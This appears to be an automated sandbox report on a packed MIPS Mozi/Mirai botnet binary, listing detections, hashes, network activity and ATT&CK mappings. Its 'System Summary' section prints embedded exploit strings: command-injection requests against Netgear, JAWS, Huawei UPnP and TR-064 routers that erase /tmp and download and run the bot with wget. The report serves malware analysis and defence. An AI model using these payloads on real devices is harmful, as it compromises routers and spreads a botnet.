Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
Mozi.m.elf

Overview

General Information

Sample name:Mozi.m.elf
Analysis ID:1591587
MD5:b08ff59d4e6bb55e881b1775edb69f4e
SHA1:cdf07c682c36ca2d6a39443f902d38fb85eadfa2
SHA256:16ed438dff7b508edbedb186e890d1e2c269a8e42d0a0c3e97171c18bc52993c
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Sample is packed with UPX
ELF contains segments with high entropy indicating compressed/encrypted content
Sample contains only a LOAD segment without any section mappings
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings that are potentially command strings
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1591587
Start date and time:2025-01-15 05:57:07 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 23s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:Mozi.m.elf
Detection:MAL
Classification:mal92.troj.evad.linELF@0/0@2/0
  • VT rate limit hit for: http://%s:%d/Mozi.a;chmod
  • VT rate limit hit for: http://%s:%d/Mozi.a;sh$
  • VT rate limit hit for: http://%s:%d/Mozi.m
  • VT rate limit hit for: http://%s:%d/Mozi.m;
  • VT rate limit hit for: http://%s:%d/Mozi.m;/tmp/Mozi.m
Command:/tmp/Mozi.m.elf
PID:5429
Exit Code:133
Exit Code Info:
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 5 (Trace/breakpoint trap) - core dumped
  • system is lnxubuntu20
  • Mozi.m.elf (PID: 5429, Parent: 5355, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/Mozi.m.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
Mozi.m.elfJoeSecurity_Mirai_4Yara detected MiraiJoe Security
    Mozi.m.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      Mozi.m.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        Mozi.m.elfLinux_Packer_Patched_UPX_62e11c64unknownunknown
        • 0x78:$a: 55 50 58 21 0A 58 0D 89 00 00 00 00 00 00 00 00 00 00 00 00
        SourceRuleDescriptionAuthorStrings
        5429.1.00007fdb88400000.00007fdb88422000.r-x.sdmpLinux_Packer_Patched_UPX_62e11c64unknownunknown
        • 0x78:$a: 55 50 58 21 0A 58 0D 89 00 00 00 00 00 00 00 00 00 00 00 00
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: Mozi.m.elfAvira: detected
        Source: Mozi.m.elfVirustotal: Detection: 58%Perma Link
        Source: Mozi.m.elfReversingLabs: Detection: 65%
        Source: global trafficTCP traffic: 192.168.2.13:48202 -> 185.125.190.26:443
        Source: unknownTCP traffic detected without corresponding DNS query: 185.125.190.26
        Source: unknownTCP traffic detected without corresponding DNS query: 185.125.190.26
        Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
        Source: Mozi.m.elfString found in binary or memory: http://%s:%d/Mozi.a;chmod
        Source: Mozi.m.elfString found in binary or memory: http://%s:%d/Mozi.a;sh$
        Source: Mozi.m.elfString found in binary or memory: http://%s:%d/Mozi.m
        Source: Mozi.m.elfString found in binary or memory: http://%s:%d/Mozi.m;
        Source: Mozi.m.elfString found in binary or memory: http://%s:%d/Mozi.m;$
        Source: Mozi.m.elfString found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
        Source: Mozi.m.elfString found in binary or memory: http://purenetworks.com/HNAP1/
        Source: Mozi.m.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: Mozi.m.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
        Source: Mozi.m.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
        Source: Mozi.m.elfString found in binary or memory: http://upx.sf.net
        Source: unknownNetwork traffic detected: HTTP traffic on port 48202 -> 443

        System Summary

        barindex
        Source: Mozi.m.elf, type: SAMPLEMatched rule: Linux_Packer_Patched_UPX_62e11c64 Author: unknown
        Source: 5429.1.00007fdb88400000.00007fdb88422000.r-x.sdmp, type: MEMORYMatched rule: Linux_Packer_Patched_UPX_62e11c64 Author: unknown
        Source: LOAD without section mappingsProgram segment: 0x400000
        Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
        Source: Initial samplePotential command found: GET /Mozi.m HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.x HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.a HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.s HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.r HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.b HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.4 HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.k HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.l HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.p HTTP/1.0
        Source: Initial samplePotential command found: GET /%s HTTP/1.1
        Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
        Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
        Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
        Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
        Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
        Source: Mozi.m.elf, type: SAMPLEMatched rule: Linux_Packer_Patched_UPX_62e11c64 reference_sample = 02f81a1e1edcb9032a1d7256a002b11e1e864b2e9989f5d24ea1c9b507895669, os = linux, severity = x86, creation_date = 2021-06-08, scan_context = file, reference = https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/, license = Elastic License v2, threat_name = Linux.Packer.Patched_UPX, fingerprint = 3297b5c63e70c557e71b739428b453039b142e1e04c2ab15eea4627d023b686d, id = 62e11c64-fc7d-4a0a-9d72-ad53ec3987ff, last_modified = 2021-07-28
        Source: 5429.1.00007fdb88400000.00007fdb88422000.r-x.sdmp, type: MEMORYMatched rule: Linux_Packer_Patched_UPX_62e11c64 reference_sample = 02f81a1e1edcb9032a1d7256a002b11e1e864b2e9989f5d24ea1c9b507895669, os = linux, severity = x86, creation_date = 2021-06-08, scan_context = file, reference = https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/, license = Elastic License v2, threat_name = Linux.Packer.Patched_UPX, fingerprint = 3297b5c63e70c557e71b739428b453039b142e1e04c2ab15eea4627d023b686d, id = 62e11c64-fc7d-4a0a-9d72-ad53ec3987ff, last_modified = 2021-07-28
        Source: classification engineClassification label: mal92.troj.evad.linELF@0/0@2/0

        Data Obfuscation

        barindex
        Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
        Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
        Source: initial sampleString containing UPX found: $Id: UPX 3.95 Copyright (C) 1996-2018 the UPX Team. All Rights Reserved. $
        Source: Mozi.m.elfSubmission file: segment LOAD with 7.8156 entropy (max. 8.0)
        Source: /tmp/Mozi.m.elf (PID: 5429)Queries kernel information via 'uname': Jump to behavior
        Source: Mozi.m.elf, 5429.1.0000557a58143000.0000557a581ca000.rw-.sdmpBinary or memory string: XzU!/etc/qemu-binfmt/mips
        Source: Mozi.m.elf, 5429.1.0000557a58143000.0000557a581ca000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
        Source: Mozi.m.elf, 5429.1.00007ffc924df000.00007ffc92500000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
        Source: Mozi.m.elf, 5429.1.00007ffc924df000.00007ffc92500000.rw-.sdmpBinary or memory string: Mx86_64/usr/bin/qemu-mips/tmp/Mozi.m.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/Mozi.m.elf
        Source: Mozi.m.elf, 5429.1.00007ffc924df000.00007ffc92500000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 5 (Trace/breakpoint trap) - core dumped

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: Mozi.m.elf, type: SAMPLE

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: Mozi.m.elf, type: SAMPLE
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Command and Scripting Interpreter
        Path InterceptionPath Interception11
        Obfuscated Files or Information
        OS Credential Dumping11
        Security Software Discovery
        Remote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        Mozi.m.elf59%VirustotalBrowse
        Mozi.m.elf66%ReversingLabsLinux.Trojan.Dakkatoni
        Mozi.m.elf100%AviraEXP/ELF.Agent.L.26
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        NameIPActiveMaliciousAntivirus DetectionReputation
        daisy.ubuntu.com
        162.213.35.24
        truefalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://upx.sf.netMozi.m.elffalse
            high
            http://%s:%d/Mozi.a;sh$Mozi.m.elffalse
              unknown
              http://%s:%d/Mozi.a;chmodMozi.m.elffalse
                unknown
                http://%s:%d/Mozi.m;/tmp/Mozi.mMozi.m.elffalse
                  unknown
                  http://schemas.xmlsoap.org/soap/encoding/Mozi.m.elffalse
                    high
                    http://schemas.xmlsoap.org/soap/envelope//Mozi.m.elffalse
                      high
                      http://%s:%d/Mozi.mMozi.m.elffalse
                        unknown
                        http://purenetworks.com/HNAP1/Mozi.m.elffalse
                          high
                          http://%s:%d/Mozi.m;Mozi.m.elffalse
                            unknown
                            http://%s:%d/Mozi.m;$Mozi.m.elffalse
                              unknown
                              http://schemas.xmlsoap.org/soap/envelope/Mozi.m.elffalse
                                high
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                185.125.190.26
                                unknownUnited Kingdom
                                41231CANONICAL-ASGBfalse
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                185.125.190.26arm7.elfGet hashmaliciousMiraiBrowse
                                  arm6.elfGet hashmaliciousMiraiBrowse
                                    main_arm.elfGet hashmaliciousMiraiBrowse
                                      m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                        bot.ppc.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                          bot.m68k.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                            Kloki.x86.elfGet hashmaliciousUnknownBrowse
                                              m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                  rebirth.mips.elfGet hashmaliciousGafgytBrowse
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    daisy.ubuntu.comla.bot.x86_64.elfGet hashmaliciousMiraiBrowse
                                                    • 162.213.35.24
                                                    mpsl.elfGet hashmaliciousMiraiBrowse
                                                    • 162.213.35.24
                                                    arm5.elfGet hashmaliciousMiraiBrowse
                                                    • 162.213.35.25
                                                    sh4.elfGet hashmaliciousMiraiBrowse
                                                    • 162.213.35.25
                                                    sh4.elfGet hashmaliciousMiraiBrowse
                                                    • 162.213.35.25
                                                    arm.elfGet hashmaliciousMiraiBrowse
                                                    • 162.213.35.24
                                                    arm7.elfGet hashmaliciousMiraiBrowse
                                                    • 162.213.35.25
                                                    arm6.elfGet hashmaliciousMiraiBrowse
                                                    • 162.213.35.25
                                                    jefne64.elfGet hashmaliciousUnknownBrowse
                                                    • 162.213.35.25
                                                    main_arm6.elfGet hashmaliciousMiraiBrowse
                                                    • 162.213.35.25
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CANONICAL-ASGBm68k.elfGet hashmaliciousMiraiBrowse
                                                    • 91.189.91.42
                                                    la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                    • 91.189.91.42
                                                    la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                    • 91.189.91.42
                                                    arm.elfGet hashmaliciousMiraiBrowse
                                                    • 91.189.91.42
                                                    arm6.elfGet hashmaliciousMiraiBrowse
                                                    • 91.189.91.42
                                                    ppc.elfGet hashmaliciousMiraiBrowse
                                                    • 91.189.91.42
                                                    mips.elfGet hashmaliciousMiraiBrowse
                                                    • 91.189.91.42
                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                    • 91.189.91.42
                                                    stoicsurgeon_ctrl__v__1.5.13.5_x86-freebsd-5.3-sassyninja-mail.aprf.gov.ruGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                    • 91.189.91.42
                                                    No context
                                                    No context
                                                    No created / dropped files found
                                                    File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
                                                    Entropy (8bit):5.0584246952818335
                                                    TrID:
                                                    • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                    • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                    File name:Mozi.m.elf
                                                    File size:307'960 bytes
                                                    MD5:b08ff59d4e6bb55e881b1775edb69f4e
                                                    SHA1:cdf07c682c36ca2d6a39443f902d38fb85eadfa2
                                                    SHA256:16ed438dff7b508edbedb186e890d1e2c269a8e42d0a0c3e97171c18bc52993c
                                                    SHA512:5d84eb5d871915e3787e136ea26a944ee4fb927366a768b8f62ff74cc042416db08c0cb32ff93933e0a629b442cddcc502d9270ff0743969988e7ccb5c4f4dea
                                                    SSDEEP:3072:phNlHuBafLeBtfCzpta8xlBIOdVo3/4sxLJ10xioSQ33Q:p3lOYoaja8xzx/0wsxzSifJ
                                                    TLSH:FD64018BEB11BC1BCA010BB115DB0B9977BCD65B82CBD181F2D4C85F39BA185B7611C9
                                                    File Content Preview:.ELF.....................B.....4.........4. ...(.............@...@...........................C...C......../..........*.*UPX!.X.....................^....|.$..ELF..........@.`....4...0... ...(......<...@......[v......H...`.t..;_...dt.Q.....].M..............

                                                    ELF header

                                                    Class:ELF32
                                                    Data:2's complement, big endian
                                                    Version:1 (current)
                                                    Machine:MIPS R3000
                                                    Version Number:0x1
                                                    Type:EXEC (Executable file)
                                                    OS/ABI:UNIX - System V
                                                    ABI Version:0
                                                    Entry Point Address:0x4206a8
                                                    Flags:0x1007
                                                    ELF Header Size:52
                                                    Program Header Offset:52
                                                    Program Header Size:32
                                                    Number of Program Headers:2
                                                    Section Header Offset:0
                                                    Section Header Size:40
                                                    Number of Section Headers:0
                                                    Header String Table Index:0
                                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                    LOAD0x00x4000000x4000000x210f20x210f27.81560x5R E0x10000
                                                    LOAD0x00x4300000x4300000x00x92fd80.00000x6RW 0x10000
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 15, 2025 05:58:00.862173080 CET48202443192.168.2.13185.125.190.26
                                                    Jan 15, 2025 05:58:31.582345009 CET48202443192.168.2.13185.125.190.26
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 15, 2025 05:57:50.718949080 CET4101253192.168.2.138.8.8.8
                                                    Jan 15, 2025 05:57:50.719084978 CET3439753192.168.2.138.8.8.8
                                                    Jan 15, 2025 05:57:50.725475073 CET53343978.8.8.8192.168.2.13
                                                    Jan 15, 2025 05:57:50.726098061 CET53410128.8.8.8192.168.2.13
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Jan 15, 2025 05:57:50.718949080 CET192.168.2.138.8.8.80x4854Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                                    Jan 15, 2025 05:57:50.719084978 CET192.168.2.138.8.8.80xe5fStandard query (0)daisy.ubuntu.com28IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Jan 15, 2025 05:57:50.726098061 CET8.8.8.8192.168.2.130x4854No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 05:57:50.726098061 CET8.8.8.8192.168.2.130x4854No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false

                                                    System Behavior

                                                    Start time (UTC):04:57:48
                                                    Start date (UTC):15/01/2025
                                                    Path:/tmp/Mozi.m.elf
                                                    Arguments:/tmp/Mozi.m.elf
                                                    File size:5777432 bytes
                                                    MD5 hash:0083f1f0e77be34ad27f849842bbb00c